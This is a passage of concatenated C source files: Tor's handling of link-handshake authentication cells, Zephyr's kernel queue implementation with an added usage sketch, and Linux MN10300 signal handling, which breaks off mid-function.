{ /* If we're not a public server then we don't want to authenticate on a connection we originated, and we already sent a NETINFO cell when we got the CERTS cell. We have nothing more to do. */ return; } if (use_type >= 0) { log_info(LD_OR, "Got an AUTH_CHALLENGE cell from %s:%d: Sending " "authentication", safe_str(conn->base_.address), conn->base_.port); if (connection_or_send_authenticate_cell(conn, use_type) < 0) { log_warn(LD_OR, "Couldn't send authenticate cell"); connection_or_close_for_error(conn, 0); return; } } else { log_info(LD_OR, "Got an AUTH_CHALLENGE cell from %s:%d, but we don't " "know any of its authentication types. Not authenticating.", safe_str(conn->base_.address), conn->base_.port); } if (connection_or_send_netinfo(conn) < 0) { log_warn(LD_OR, "Couldn't send netinfo cell"); connection_or_close_for_error(conn, 0); return; } #undef ERR } /** * Process an AUTHENTICATE cell from a channel_tls_t * * If it's ill-formed or we weren't supposed to get one or we're not doing a * v3 handshake, then mark the connection. If it does not authenticate the * other side of the connection successfully (because it isn't signed right, * we didn't get a CERTS cell, etc) mark the connection. Otherwise, accept * the identity of the router on the other side of the connection. 
*/ static void channel_tls_process_authenticate_cell(var_cell_t *cell, channel_t *chan, or_connection_t *conn) { uint8_t expected[V3_AUTH_FIXED_PART_LEN]; const uint8_t *auth; int authlen; tor_assert(cell); tor_assert(chan); tor_assert(conn); #define ERR(s) \ do { \ log_fn(LOG_PROTOCOL_WARN, LD_PROTOCOL, \ "Received a bad AUTHENTICATE cell from %s:%d: %s", \ safe_str(conn->base_.address), \ conn->base_.port, (s)); \ connection_or_close_for_error(conn, 0); \ return; \ } while (0) if (conn->base_.state != OR_CONN_STATE_OR_HANDSHAKING_V3) ERR("We're not doing a v3 handshake"); if (conn->link_proto < 3) ERR("We're not using link protocol >= 3"); if (conn->handshake_state->started_here) ERR("We originated this connection"); if (conn->handshake_state->received_authenticate) ERR("We already got one!"); if (conn->handshake_state->authenticated) { /* Should be impossible given other checks */ ERR("The peer is already authenticated"); } if (!(conn->handshake_state->received_certs_cell)) ERR("We never got a certs cell"); if (conn->handshake_state->auth_cert == NULL) ERR("We never got an authentication certificate"); if (conn->handshake_state->id_cert == NULL) ERR("We never got an identity certificate"); if (cell->payload_len < 4) ERR("Cell was way too short"); auth = cell->payload; { uint16_t type = ntohs(get_uint16(auth)); uint16_t len = ntohs(get_uint16(auth+2)); if (4 + len > cell->payload_len) ERR("Authenticator was truncated"); if (type != AUTHTYPE_RSA_SHA256_TLSSECRET) ERR("Authenticator type was not recognized"); auth += 4; authlen = len; } if (authlen < V3_AUTH_BODY_LEN + 1) ERR("Authenticator was too short"); if (connection_or_compute_authenticate_cell_body( conn, expected, sizeof(expected), NULL, 1) < 0) ERR("Couldn't compute expected AUTHENTICATE cell body"); if (tor_memneq(expected, auth, sizeof(expected))) ERR("Some field in the AUTHENTICATE cell body was not as expected"); { crypto_pk_t *pk = tor_tls_cert_get_key( conn->handshake_state->auth_cert); char d[DIGEST256_LEN]; char *signed_data; size_t keysize; int signed_len; if (!pk) ERR("Internal error: couldn't get RSA key from AUTH cert."); crypto_digest256(d, (char*)auth, V3_AUTH_BODY_LEN, DIGEST_SHA256); keysize = crypto_pk_keysize(pk); signed_data = tor_malloc(keysize); signed_len = crypto_pk_public_checksig(pk, signed_data, keysize, (char*)auth + V3_AUTH_BODY_LEN, authlen - V3_AUTH_BODY_LEN); crypto_pk_free(pk); if (signed_len < 0) { tor_free(signed_data); ERR("Signature wasn't valid"); } if (signed_len < DIGEST256_LEN) { tor_free(signed_data); ERR("Not enough data was signed"); } /* Note that we deliberately allow *more* than DIGEST256_LEN bytes here, * in case they're later used to hold a SHA3 digest or something. */ if (tor_memneq(signed_data, d, DIGEST256_LEN)) { tor_free(signed_data); ERR("Signature did not match data to be signed."); } tor_free(signed_data); } /* Okay, we are authenticated. */ conn->handshake_state->received_authenticate = 1; conn->handshake_state->authenticated = 1; conn->handshake_state->digest_received_data = 0; { crypto_pk_t *identity_rcvd = tor_tls_cert_get_key(conn->handshake_state->id_cert); const digests_t *id_digests = tor_cert_get_id_digests(conn->handshake_state->id_cert); /* This must exist; we checked key type when reading the cert. 
*/ tor_assert(id_digests); memcpy(conn->handshake_state->authenticated_peer_id, id_digests->d[DIGEST_SHA1], DIGEST_LEN); channel_set_circid_type(chan, identity_rcvd, conn->link_proto < MIN_LINK_PROTO_FOR_WIDE_CIRC_IDS); crypto_pk_free(identity_rcvd); connection_or_init_conn_from_address(conn, &(conn->base_.addr), conn->base_.port, (const char*)(conn->handshake_state-> authenticated_peer_id), 0); log_info(LD_OR, "Got an AUTHENTICATE cell from %s:%d: Looks good.", safe_str(conn->base_.address), conn->base_.port); } #undef ERR }
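/*
 * Editor's usage sketch (not part of the original file): a minimal,
 * hypothetical illustration of how the channel_tls_t API above is driven
 * from the caller's side.  The address literal and zeroed digest are
 * placeholders only; a real caller must supply the expected identity
 * digest of the relay it is connecting to.
 */
#if 0 /* illustrative sketch -- not compiled */
static void
example_open_tls_channel(void)
{
  tor_addr_t addr;
  char id_digest[DIGEST_LEN];

  memset(id_digest, 0, sizeof(id_digest)); /* placeholder digest */
  tor_addr_parse(&addr, "192.0.2.1");      /* RFC 5737 example address */

  /* channel_tls_connect() allocates the channel, opens the underlying
   * or_connection_t and registers the channel; cells become writable
   * once channel_tls_handle_state_change_on_orconn() sees the orconn
   * reach OR_CONN_STATE_OPEN. */
  channel_t *chan = channel_tls_connect(&addr, 9001, id_digest);
  if (chan)
    channel_mark_client(chan);
}
#endif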
259454.c
/* * Copyright (c) 2010-2016 Wind River Systems, Inc. * * SPDX-License-Identifier: Apache-2.0 */ /** * @file * * @brief dynamic-size QUEUE object. */ #include <kernel.h> #include <kernel_structs.h> #include <toolchain.h> #include <wait_q.h> #include <ksched.h> #include <init.h> #include <syscall_handler.h> #include <kernel_internal.h> #include <sys/check.h> struct alloc_node { sys_sfnode_t node; void *data; }; void *z_queue_node_peek(sys_sfnode_t *node, bool needs_free) { void *ret; if ((node != NULL) && (sys_sfnode_flags_get(node) != (uint8_t)0)) { /* If the flag is set, then the enqueue operation for this item * did a behind-the scenes memory allocation of an alloc_node * struct, which is what got put in the queue. Free it and pass * back the data pointer. */ struct alloc_node *anode; anode = CONTAINER_OF(node, struct alloc_node, node); ret = anode->data; if (needs_free) { k_free(anode); } } else { /* Data was directly placed in the queue, the first word * reserved for the linked list. User mode isn't allowed to * do this, although it can get data sent this way. */ ret = (void *)node; } return ret; } void z_impl_k_queue_init(struct k_queue *queue) { sys_sflist_init(&queue->data_q); queue->lock = (struct k_spinlock) {}; z_waitq_init(&queue->wait_q); #if defined(CONFIG_POLL) sys_dlist_init(&queue->poll_events); #endif SYS_PORT_TRACING_OBJ_INIT(k_queue, queue); z_object_init(queue); } #ifdef CONFIG_USERSPACE static inline void z_vrfy_k_queue_init(struct k_queue *queue) { Z_OOPS(Z_SYSCALL_OBJ_NEVER_INIT(queue, K_OBJ_QUEUE)); z_impl_k_queue_init(queue); } #include <syscalls/k_queue_init_mrsh.c> #endif static void prepare_thread_to_run(struct k_thread *thread, void *data) { z_thread_return_value_set_with_data(thread, 0, data); z_ready_thread(thread); } static inline void handle_poll_events(struct k_queue *queue, uint32_t state) { #ifdef CONFIG_POLL z_handle_obj_poll_events(&queue->poll_events, state); #endif } void z_impl_k_queue_cancel_wait(struct k_queue *queue) { SYS_PORT_TRACING_OBJ_FUNC(k_queue, cancel_wait, queue); k_spinlock_key_t key = k_spin_lock(&queue->lock); struct k_thread *first_pending_thread; first_pending_thread = z_unpend_first_thread(&queue->wait_q); if (first_pending_thread != NULL) { prepare_thread_to_run(first_pending_thread, NULL); } handle_poll_events(queue, K_POLL_STATE_CANCELLED); z_reschedule(&queue->lock, key); } #ifdef CONFIG_USERSPACE static inline void z_vrfy_k_queue_cancel_wait(struct k_queue *queue) { Z_OOPS(Z_SYSCALL_OBJ(queue, K_OBJ_QUEUE)); z_impl_k_queue_cancel_wait(queue); } #include <syscalls/k_queue_cancel_wait_mrsh.c> #endif static int32_t queue_insert(struct k_queue *queue, void *prev, void *data, bool alloc, bool is_append) { struct k_thread *first_pending_thread; k_spinlock_key_t key = k_spin_lock(&queue->lock); SYS_PORT_TRACING_OBJ_FUNC_ENTER(k_queue, queue_insert, queue, alloc); if (is_append) { prev = sys_sflist_peek_tail(&queue->data_q); } first_pending_thread = z_unpend_first_thread(&queue->wait_q); if (first_pending_thread != NULL) { SYS_PORT_TRACING_OBJ_FUNC_BLOCKING(k_queue, queue_insert, queue, alloc, K_FOREVER); prepare_thread_to_run(first_pending_thread, data); z_reschedule(&queue->lock, key); SYS_PORT_TRACING_OBJ_FUNC_EXIT(k_queue, queue_insert, queue, alloc, 0); return 0; } /* Only need to actually allocate if no threads are pending */ if (alloc) { struct alloc_node *anode; anode = z_thread_malloc(sizeof(*anode)); if (anode == NULL) { k_spin_unlock(&queue->lock, key); SYS_PORT_TRACING_OBJ_FUNC_EXIT(k_queue, queue_insert, queue, alloc, 
-ENOMEM); return -ENOMEM; } anode->data = data; sys_sfnode_init(&anode->node, 0x1); data = anode; } else { sys_sfnode_init(data, 0x0); } SYS_PORT_TRACING_OBJ_FUNC_BLOCKING(k_queue, queue_insert, queue, alloc, K_FOREVER); sys_sflist_insert(&queue->data_q, prev, data); handle_poll_events(queue, K_POLL_STATE_DATA_AVAILABLE); z_reschedule(&queue->lock, key); SYS_PORT_TRACING_OBJ_FUNC_EXIT(k_queue, queue_insert, queue, alloc, 0); return 0; } void k_queue_insert(struct k_queue *queue, void *prev, void *data) { SYS_PORT_TRACING_OBJ_FUNC_ENTER(k_queue, insert, queue); (void)queue_insert(queue, prev, data, false, false); SYS_PORT_TRACING_OBJ_FUNC_EXIT(k_queue, insert, queue); } void k_queue_append(struct k_queue *queue, void *data) { SYS_PORT_TRACING_OBJ_FUNC_ENTER(k_queue, append, queue); (void)queue_insert(queue, NULL, data, false, true); SYS_PORT_TRACING_OBJ_FUNC_EXIT(k_queue, append, queue); } void k_queue_prepend(struct k_queue *queue, void *data) { SYS_PORT_TRACING_OBJ_FUNC_ENTER(k_queue, prepend, queue); (void)queue_insert(queue, NULL, data, false, false); SYS_PORT_TRACING_OBJ_FUNC_EXIT(k_queue, prepend, queue); } int32_t z_impl_k_queue_alloc_append(struct k_queue *queue, void *data) { SYS_PORT_TRACING_OBJ_FUNC_ENTER(k_queue, alloc_append, queue); int32_t ret = queue_insert(queue, NULL, data, true, true); SYS_PORT_TRACING_OBJ_FUNC_EXIT(k_queue, alloc_append, queue, ret); return ret; } #ifdef CONFIG_USERSPACE static inline int32_t z_vrfy_k_queue_alloc_append(struct k_queue *queue, void *data) { Z_OOPS(Z_SYSCALL_OBJ(queue, K_OBJ_QUEUE)); return z_impl_k_queue_alloc_append(queue, data); } #include <syscalls/k_queue_alloc_append_mrsh.c> #endif int32_t z_impl_k_queue_alloc_prepend(struct k_queue *queue, void *data) { SYS_PORT_TRACING_OBJ_FUNC_ENTER(k_queue, alloc_prepend, queue); int32_t ret = queue_insert(queue, NULL, data, true, false); SYS_PORT_TRACING_OBJ_FUNC_EXIT(k_queue, alloc_prepend, queue, ret); return ret; } #ifdef CONFIG_USERSPACE static inline int32_t z_vrfy_k_queue_alloc_prepend(struct k_queue *queue, void *data) { Z_OOPS(Z_SYSCALL_OBJ(queue, K_OBJ_QUEUE)); return z_impl_k_queue_alloc_prepend(queue, data); } #include <syscalls/k_queue_alloc_prepend_mrsh.c> #endif int k_queue_append_list(struct k_queue *queue, void *head, void *tail) { SYS_PORT_TRACING_OBJ_FUNC_ENTER(k_queue, append_list, queue); /* invalid head or tail of list */ CHECKIF(head == NULL || tail == NULL) { SYS_PORT_TRACING_OBJ_FUNC_EXIT(k_queue, append_list, queue, -EINVAL); return -EINVAL; } k_spinlock_key_t key = k_spin_lock(&queue->lock); struct k_thread *thread = NULL; if (head != NULL) { thread = z_unpend_first_thread(&queue->wait_q); } while ((head != NULL) && (thread != NULL)) { prepare_thread_to_run(thread, head); head = *(void **)head; thread = z_unpend_first_thread(&queue->wait_q); } if (head != NULL) { sys_sflist_append_list(&queue->data_q, head, tail); } SYS_PORT_TRACING_OBJ_FUNC_EXIT(k_queue, append_list, queue, 0); handle_poll_events(queue, K_POLL_STATE_DATA_AVAILABLE); z_reschedule(&queue->lock, key); return 0; } int k_queue_merge_slist(struct k_queue *queue, sys_slist_t *list) { int ret; SYS_PORT_TRACING_OBJ_FUNC_ENTER(k_queue, merge_slist, queue); /* list must not be empty */ CHECKIF(sys_slist_is_empty(list)) { SYS_PORT_TRACING_OBJ_FUNC_EXIT(k_queue, merge_slist, queue, -EINVAL); return -EINVAL; } /* * note: this works as long as: * - the slist implementation keeps the next pointer as the first * field of the node object type * - list->tail->next = NULL. 
* - sflist implementation only differs from slist by stuffing * flag bytes in the lower order bits of the data pointer * - source list is really an slist and not an sflist with flags set */ ret = k_queue_append_list(queue, list->head, list->tail); CHECKIF(ret != 0) { SYS_PORT_TRACING_OBJ_FUNC_EXIT(k_queue, merge_slist, queue, ret); return ret; } sys_slist_init(list); SYS_PORT_TRACING_OBJ_FUNC_EXIT(k_queue, merge_slist, queue, 0); return 0; } void *z_impl_k_queue_get(struct k_queue *queue, k_timeout_t timeout) { k_spinlock_key_t key = k_spin_lock(&queue->lock); void *data; SYS_PORT_TRACING_OBJ_FUNC_ENTER(k_queue, get, queue, timeout); if (likely(!sys_sflist_is_empty(&queue->data_q))) { sys_sfnode_t *node; node = sys_sflist_get_not_empty(&queue->data_q); data = z_queue_node_peek(node, true); k_spin_unlock(&queue->lock, key); SYS_PORT_TRACING_OBJ_FUNC_EXIT(k_queue, get, queue, timeout, data); return data; } SYS_PORT_TRACING_OBJ_FUNC_BLOCKING(k_queue, get, queue, timeout); if (K_TIMEOUT_EQ(timeout, K_NO_WAIT)) { k_spin_unlock(&queue->lock, key); SYS_PORT_TRACING_OBJ_FUNC_EXIT(k_queue, get, queue, timeout, NULL); return NULL; } int ret = z_pend_curr(&queue->lock, key, &queue->wait_q, timeout); SYS_PORT_TRACING_OBJ_FUNC_EXIT(k_queue, get, queue, timeout, (ret != 0) ? NULL : _current->base.swap_data); return (ret != 0) ? NULL : _current->base.swap_data; } bool k_queue_remove(struct k_queue *queue, void *data) { SYS_PORT_TRACING_OBJ_FUNC_ENTER(k_queue, remove, queue); bool ret = sys_sflist_find_and_remove(&queue->data_q, (sys_sfnode_t *)data); SYS_PORT_TRACING_OBJ_FUNC_EXIT(k_queue, remove, queue, ret); return ret; } bool k_queue_unique_append(struct k_queue *queue, void *data) { SYS_PORT_TRACING_OBJ_FUNC_ENTER(k_queue, unique_append, queue); sys_sfnode_t *test; SYS_SFLIST_FOR_EACH_NODE(&queue->data_q, test) { if (test == (sys_sfnode_t *) data) { SYS_PORT_TRACING_OBJ_FUNC_EXIT(k_queue, unique_append, queue, false); return false; } } k_queue_append(queue, data); SYS_PORT_TRACING_OBJ_FUNC_EXIT(k_queue, unique_append, queue, true); return true; } void *z_impl_k_queue_peek_head(struct k_queue *queue) { void *ret = z_queue_node_peek(sys_sflist_peek_head(&queue->data_q), false); SYS_PORT_TRACING_OBJ_FUNC(k_queue, peek_head, queue, ret); return ret; } void *z_impl_k_queue_peek_tail(struct k_queue *queue) { void *ret = z_queue_node_peek(sys_sflist_peek_tail(&queue->data_q), false); SYS_PORT_TRACING_OBJ_FUNC(k_queue, peek_tail, queue, ret); return ret; } #ifdef CONFIG_USERSPACE static inline void *z_vrfy_k_queue_get(struct k_queue *queue, k_timeout_t timeout) { Z_OOPS(Z_SYSCALL_OBJ(queue, K_OBJ_QUEUE)); return z_impl_k_queue_get(queue, timeout); } #include <syscalls/k_queue_get_mrsh.c> static inline int z_vrfy_k_queue_is_empty(struct k_queue *queue) { Z_OOPS(Z_SYSCALL_OBJ(queue, K_OBJ_QUEUE)); return z_impl_k_queue_is_empty(queue); } #include <syscalls/k_queue_is_empty_mrsh.c> static inline void *z_vrfy_k_queue_peek_head(struct k_queue *queue) { Z_OOPS(Z_SYSCALL_OBJ(queue, K_OBJ_QUEUE)); return z_impl_k_queue_peek_head(queue); } #include <syscalls/k_queue_peek_head_mrsh.c> static inline void *z_vrfy_k_queue_peek_tail(struct k_queue *queue) { Z_OOPS(Z_SYSCALL_OBJ(queue, K_OBJ_QUEUE)); return z_impl_k_queue_peek_tail(queue); } #include <syscalls/k_queue_peek_tail_mrsh.c> #endif /* CONFIG_USERSPACE */
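/*
 * Editor's usage sketch (not part of the original file): a minimal,
 * hypothetical illustration of the two enqueue flavours implemented
 * above.  With k_queue_append() the caller reserves the first word of
 * the item for the queue's linked-list node; k_queue_alloc_append()
 * instead wraps the data pointer in a heap-allocated alloc_node, as
 * queue_insert() does when 'alloc' is true.
 */
#if 0 /* illustrative sketch -- not built with the kernel */
struct my_item {
	void *reserved; /* first word reserved for use as the queue node */
	uint32_t payload;
};

static struct k_queue my_queue;

static void example_queue_usage(void)
{
	static struct my_item item = { .payload = 42U };
	struct my_item *got;

	k_queue_init(&my_queue);

	/* No allocation: the queue links through item.reserved. */
	k_queue_append(&my_queue, &item);

	/* Wait up to 100 ms; returns NULL if nothing arrives in time. */
	got = k_queue_get(&my_queue, K_MSEC(100));
	ARG_UNUSED(got);
}
#endif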
571419.c
/* MN10300 Signal handling
 *
 * Copyright (C) 2007 Red Hat, Inc. All Rights Reserved.
 * Written by David Howells (dhowells@redhat.com)
 *
 * This program is free software; you can redistribute it and/or
 * modify it under the terms of the GNU General Public Licence
 * as published by the Free Software Foundation; either version
 * 2 of the Licence, or (at your option) any later version.
 */
#include <linux/sched.h>
#include <linux/mm.h>
#include <linux/smp.h>
#include <linux/kernel.h>
#include <linux/signal.h>
#include <linux/errno.h>
#include <linux/wait.h>
#include <linux/ptrace.h>
#include <linux/unistd.h>
#include <linux/stddef.h>
#include <linux/tty.h>
#include <linux/personality.h>
#include <linux/suspend.h>
#include <linux/tracehook.h>
#include <asm/cacheflush.h>
#include <asm/ucontext.h>
#include <asm/uaccess.h>
#include <asm/fpu.h>
#include "sigframe.h"

#define DEBUG_SIG 0

/*
 * atomically swap in the new signal mask, and wait for a signal.
 */
asmlinkage long sys_sigsuspend(int history0, int history1, old_sigset_t mask)
{
	sigset_t blocked;

	siginitset(&blocked, mask);
	return sigsuspend(&blocked);
}

/*
 * set signal action syscall
 */
asmlinkage long sys_sigaction(int sig,
			      const struct old_sigaction __user *act,
			      struct old_sigaction __user *oact)
{
	struct k_sigaction new_ka, old_ka;
	int ret;

	if (act) {
		old_sigset_t mask;
		if (verify_area(VERIFY_READ, act, sizeof(*act)) ||
		    __get_user(new_ka.sa.sa_handler, &act->sa_handler) ||
		    __get_user(new_ka.sa.sa_restorer, &act->sa_restorer) ||
		    __get_user(new_ka.sa.sa_flags, &act->sa_flags) ||
		    __get_user(mask, &act->sa_mask))
			return -EFAULT;
		siginitset(&new_ka.sa.sa_mask, mask);
	}

	ret = do_sigaction(sig, act ? &new_ka : NULL, oact ? &old_ka : NULL);

	if (!ret && oact) {
		if (verify_area(VERIFY_WRITE, oact, sizeof(*oact)) ||
		    __put_user(old_ka.sa.sa_handler, &oact->sa_handler) ||
		    __put_user(old_ka.sa.sa_restorer, &oact->sa_restorer) ||
		    __put_user(old_ka.sa.sa_flags, &oact->sa_flags) ||
		    __put_user(old_ka.sa.sa_mask.sig[0], &oact->sa_mask))
			return -EFAULT;
	}

	return ret;
}

/*
 * set alternate signal stack syscall
 */
asmlinkage long sys_sigaltstack(const stack_t __user *uss,
				stack_t __user *uoss)
{
	return do_sigaltstack(uss, uoss, current_frame()->sp);
}

/*
 * do a signal return; undo the signal stack.
*/ static int restore_sigcontext(struct pt_regs *regs, struct sigcontext __user *sc, long *_d0) { unsigned int err = 0; /* Always make any pending restarted system calls return -EINTR */ current_thread_info()->restart_block.fn = do_no_restart_syscall; if (is_using_fpu(current)) fpu_kill_state(current); #define COPY(x) err |= __get_user(regs->x, &sc->x) COPY(d1); COPY(d2); COPY(d3); COPY(a0); COPY(a1); COPY(a2); COPY(a3); COPY(e0); COPY(e1); COPY(e2); COPY(e3); COPY(e4); COPY(e5); COPY(e6); COPY(e7); COPY(lar); COPY(lir); COPY(mdr); COPY(mdrq); COPY(mcvf); COPY(mcrl); COPY(mcrh); COPY(sp); COPY(pc); #undef COPY { unsigned int tmpflags; #ifndef CONFIG_MN10300_USING_JTAG #define USER_EPSW (EPSW_FLAG_Z | EPSW_FLAG_N | EPSW_FLAG_C | EPSW_FLAG_V | \ EPSW_T | EPSW_nAR) #else #define USER_EPSW (EPSW_FLAG_Z | EPSW_FLAG_N | EPSW_FLAG_C | EPSW_FLAG_V | \ EPSW_nAR) #endif err |= __get_user(tmpflags, &sc->epsw); regs->epsw = (regs->epsw & ~USER_EPSW) | (tmpflags & USER_EPSW); regs->orig_d0 = -1; /* disable syscall checks */ } { struct fpucontext *buf; err |= __get_user(buf, &sc->fpucontext); if (buf) { if (verify_area(VERIFY_READ, buf, sizeof(*buf))) goto badframe; err |= fpu_restore_sigcontext(buf); } } err |= __get_user(*_d0, &sc->d0); return err; badframe: return 1; } /* * standard signal return syscall */ asmlinkage long sys_sigreturn(void) { struct sigframe __user *frame; sigset_t set; long d0; frame = (struct sigframe __user *) current_frame()->sp; if (verify_area(VERIFY_READ, frame, sizeof(*frame))) goto badframe; if (__get_user(set.sig[0], &frame->sc.oldmask)) goto badframe; if (_NSIG_WORDS > 1 && __copy_from_user(&set.sig[1], &frame->extramask, sizeof(frame->extramask))) goto badframe; set_current_blocked(&set); if (restore_sigcontext(current_frame(), &frame->sc, &d0)) goto badframe; return d0; badframe: force_sig(SIGSEGV, current); return 0; } /* * realtime signal return syscall */ asmlinkage long sys_rt_sigreturn(void) { struct rt_sigframe __user *frame; sigset_t set; long d0; frame = (struct rt_sigframe __user *) current_frame()->sp; if (verify_area(VERIFY_READ, frame, sizeof(*frame))) goto badframe; if (__copy_from_user(&set, &frame->uc.uc_sigmask, sizeof(set))) goto badframe; set_current_blocked(&set); if (restore_sigcontext(current_frame(), &frame->uc.uc_mcontext, &d0)) goto badframe; if (do_sigaltstack(&frame->uc.uc_stack, NULL, current_frame()->sp) == -EFAULT) goto badframe; return d0; badframe: force_sig(SIGSEGV, current); return 0; } /* * store the userspace context into a signal frame */ static int setup_sigcontext(struct sigcontext __user *sc, struct fpucontext *fpuctx, struct pt_regs *regs, unsigned long mask) { int tmp, err = 0; #define COPY(x) err |= __put_user(regs->x, &sc->x) COPY(d0); COPY(d1); COPY(d2); COPY(d3); COPY(a0); COPY(a1); COPY(a2); COPY(a3); COPY(e0); COPY(e1); COPY(e2); COPY(e3); COPY(e4); COPY(e5); COPY(e6); COPY(e7); COPY(lar); COPY(lir); COPY(mdr); COPY(mdrq); COPY(mcvf); COPY(mcrl); COPY(mcrh); COPY(sp); COPY(epsw); COPY(pc); #undef COPY tmp = fpu_setup_sigcontext(fpuctx); if (tmp < 0) err = 1; else err |= __put_user(tmp ? fpuctx : NULL, &sc->fpucontext); /* non-iBCS2 extensions.. */ err |= __put_user(mask, &sc->oldmask); return err; } /* * determine which stack to use.. */ static inline void __user *get_sigframe(struct k_sigaction *ka, struct pt_regs *regs, size_t frame_size) { unsigned long sp; /* default to using normal stack */ sp = regs->sp; /* this is the X/Open sanctioned signal stack switching. 
*/ if (ka->sa.sa_flags & SA_ONSTACK) { if (sas_ss_flags(sp) == 0) sp = current->sas_ss_sp + current->sas_ss_size; } return (void __user *) ((sp - frame_size) & ~7UL); } /* * set up a normal signal frame */ static int setup_frame(int sig, struct k_sigaction *ka, sigset_t *set, struct pt_regs *regs) { struct sigframe __user *frame; int rsig; frame = get_sigframe(ka, regs, sizeof(*frame)); if (!access_ok(VERIFY_WRITE, frame, sizeof(*frame))) goto give_sigsegv; rsig = sig; if (sig < 32 && current_thread_info()->exec_domain && current_thread_info()->exec_domain->signal_invmap) rsig = current_thread_info()->exec_domain->signal_invmap[sig]; if (__put_user(rsig, &frame->sig) < 0 || __put_user(&frame->sc, &frame->psc) < 0) goto give_sigsegv; if (setup_sigcontext(&frame->sc, &frame->fpuctx, regs, set->sig[0])) goto give_sigsegv; if (_NSIG_WORDS > 1) { if (__copy_to_user(frame->extramask, &set->sig[1], sizeof(frame->extramask))) goto give_sigsegv; } /* set up to return from userspace. If provided, use a stub already in * userspace */ if (ka->sa.sa_flags & SA_RESTORER) { if (__put_user(ka->sa.sa_restorer, &frame->pretcode)) goto give_sigsegv; } else { if (__put_user((void (*)(void))frame->retcode, &frame->pretcode)) goto give_sigsegv; /* this is mov $,d0; syscall 0 */ if (__put_user(0x2c, (char *)(frame->retcode + 0)) || __put_user(__NR_sigreturn, (char *)(frame->retcode + 1)) || __put_user(0x00, (char *)(frame->retcode + 2)) || __put_user(0xf0, (char *)(frame->retcode + 3)) || __put_user(0xe0, (char *)(frame->retcode + 4))) goto give_sigsegv; flush_icache_range((unsigned long) frame->retcode, (unsigned long) frame->retcode + 5); } /* set up registers for signal handler */ regs->sp = (unsigned long) frame; regs->pc = (unsigned long) ka->sa.sa_handler; regs->d0 = sig; regs->d1 = (unsigned long) &frame->sc; #if DEBUG_SIG printk(KERN_DEBUG "SIG deliver %d (%s:%d): sp=%p pc=%lx ra=%p\n", sig, current->comm, current->pid, frame, regs->pc, frame->pretcode); #endif return 0; give_sigsegv: force_sigsegv(sig, current); return -EFAULT; } /* * set up a realtime signal frame */ static int setup_rt_frame(int sig, struct k_sigaction *ka, siginfo_t *info, sigset_t *set, struct pt_regs *regs) { struct rt_sigframe __user *frame; int rsig; frame = get_sigframe(ka, regs, sizeof(*frame)); if (!access_ok(VERIFY_WRITE, frame, sizeof(*frame))) goto give_sigsegv; rsig = sig; if (sig < 32 && current_thread_info()->exec_domain && current_thread_info()->exec_domain->signal_invmap) rsig = current_thread_info()->exec_domain->signal_invmap[sig]; if (__put_user(rsig, &frame->sig) || __put_user(&frame->info, &frame->pinfo) || __put_user(&frame->uc, &frame->puc) || copy_siginfo_to_user(&frame->info, info)) goto give_sigsegv; /* create the ucontext. */ if (__put_user(0, &frame->uc.uc_flags) || __put_user(0, &frame->uc.uc_link) || __put_user((void *)current->sas_ss_sp, &frame->uc.uc_stack.ss_sp) || __put_user(sas_ss_flags(regs->sp), &frame->uc.uc_stack.ss_flags) || __put_user(current->sas_ss_size, &frame->uc.uc_stack.ss_size) || setup_sigcontext(&frame->uc.uc_mcontext, &frame->fpuctx, regs, set->sig[0]) || __copy_to_user(&frame->uc.uc_sigmask, set, sizeof(*set))) goto give_sigsegv; /* set up to return from userspace. 
If provided, use a stub already in * userspace */ if (ka->sa.sa_flags & SA_RESTORER) { if (__put_user(ka->sa.sa_restorer, &frame->pretcode)) goto give_sigsegv; } else { if (__put_user((void(*)(void))frame->retcode, &frame->pretcode) || /* This is mov $,d0; syscall 0 */ __put_user(0x2c, (char *)(frame->retcode + 0)) || __put_user(__NR_rt_sigreturn, (char *)(frame->retcode + 1)) || __put_user(0x00, (char *)(frame->retcode + 2)) || __put_user(0xf0, (char *)(frame->retcode + 3)) || __put_user(0xe0, (char *)(frame->retcode + 4))) goto give_sigsegv; flush_icache_range((u_long) frame->retcode, (u_long) frame->retcode + 5); } /* Set up registers for signal handler */ regs->sp = (unsigned long) frame; regs->pc = (unsigned long) ka->sa.sa_handler; regs->d0 = sig; regs->d1 = (long) &frame->info; #if DEBUG_SIG printk(KERN_DEBUG "SIG deliver %d (%s:%d): sp=%p pc=%lx ra=%p\n", sig, current->comm, current->pid, frame, regs->pc, frame->pretcode); #endif return 0; give_sigsegv: force_sigsegv(sig, current); return -EFAULT; } static inline void stepback(struct pt_regs *regs) { regs->pc -= 2; regs->orig_d0 = -1; } /* * handle the actual delivery of a signal to userspace */ static int handle_signal(int sig, siginfo_t *info, struct k_sigaction *ka, struct pt_regs *regs) { sigset_t *oldset = sigmask_to_save(); int ret; /* Are we from a system call? */ if (regs->orig_d0 >= 0) { /* If so, check system call restarting.. */ switch (regs->d0) { case -ERESTART_RESTARTBLOCK: case -ERESTARTNOHAND: regs->d0 = -EINTR; break; case -ERESTARTSYS: if (!(ka->sa.sa_flags & SA_RESTART)) { regs->d0 = -EINTR; break; } /* fallthrough */ case -ERESTARTNOINTR: regs->d0 = regs->orig_d0; stepback(regs); } } /* Set up the stack frame */ if (ka->sa.sa_flags & SA_SIGINFO) ret = setup_rt_frame(sig, ka, info, oldset, regs); else ret = setup_frame(sig, ka, oldset, regs); if (ret) return ret; signal_delivered(sig, info, ka, regs, test_thread_flag(TIF_SINGLESTEP)); return 0; } /* * handle a potential signal */ static void do_signal(struct pt_regs *regs) { struct k_sigaction ka; siginfo_t info; int signr; signr = get_signal_to_deliver(&info, &ka, regs, NULL); if (signr > 0) { if (handle_signal(signr, &info, &ka, regs) == 0) { } return; } /* did we come from a system call? */ if (regs->orig_d0 >= 0) { /* restart the system call - no handlers present */ switch (regs->d0) { case -ERESTARTNOHAND: case -ERESTARTSYS: case -ERESTARTNOINTR: regs->d0 = regs->orig_d0; stepback(regs); break; case -ERESTART_RESTARTBLOCK: regs->d0 = __NR_restart_syscall; stepback(regs); break; } } /* if there's no signal to deliver, we just put the saved sigmask * back */ restore_saved_sigmask(); } /* * notification of userspace execution resumption * - triggered by current->work.notify_resume */ asmlinkage void do_notify_resume(struct pt_regs *regs, u32 thread_info_flags) { /* Pending single-step? */ if (thread_info_flags & _TIF_SINGLESTEP) { #ifndef CONFIG_MN10300_USING_JTAG regs->epsw |= EPSW_T; clear_thread_flag(TIF_SINGLESTEP); #else BUG(); /* no h/w single-step if using JTAG unit */ #endif } /* deal with pending signal delivery */ if (thread_info_flags & _TIF_SIGPENDING) do_signal(regs); if (thread_info_flags & _TIF_NOTIFY_RESUME) { clear_thread_flag(TIF_NOTIFY_RESUME); 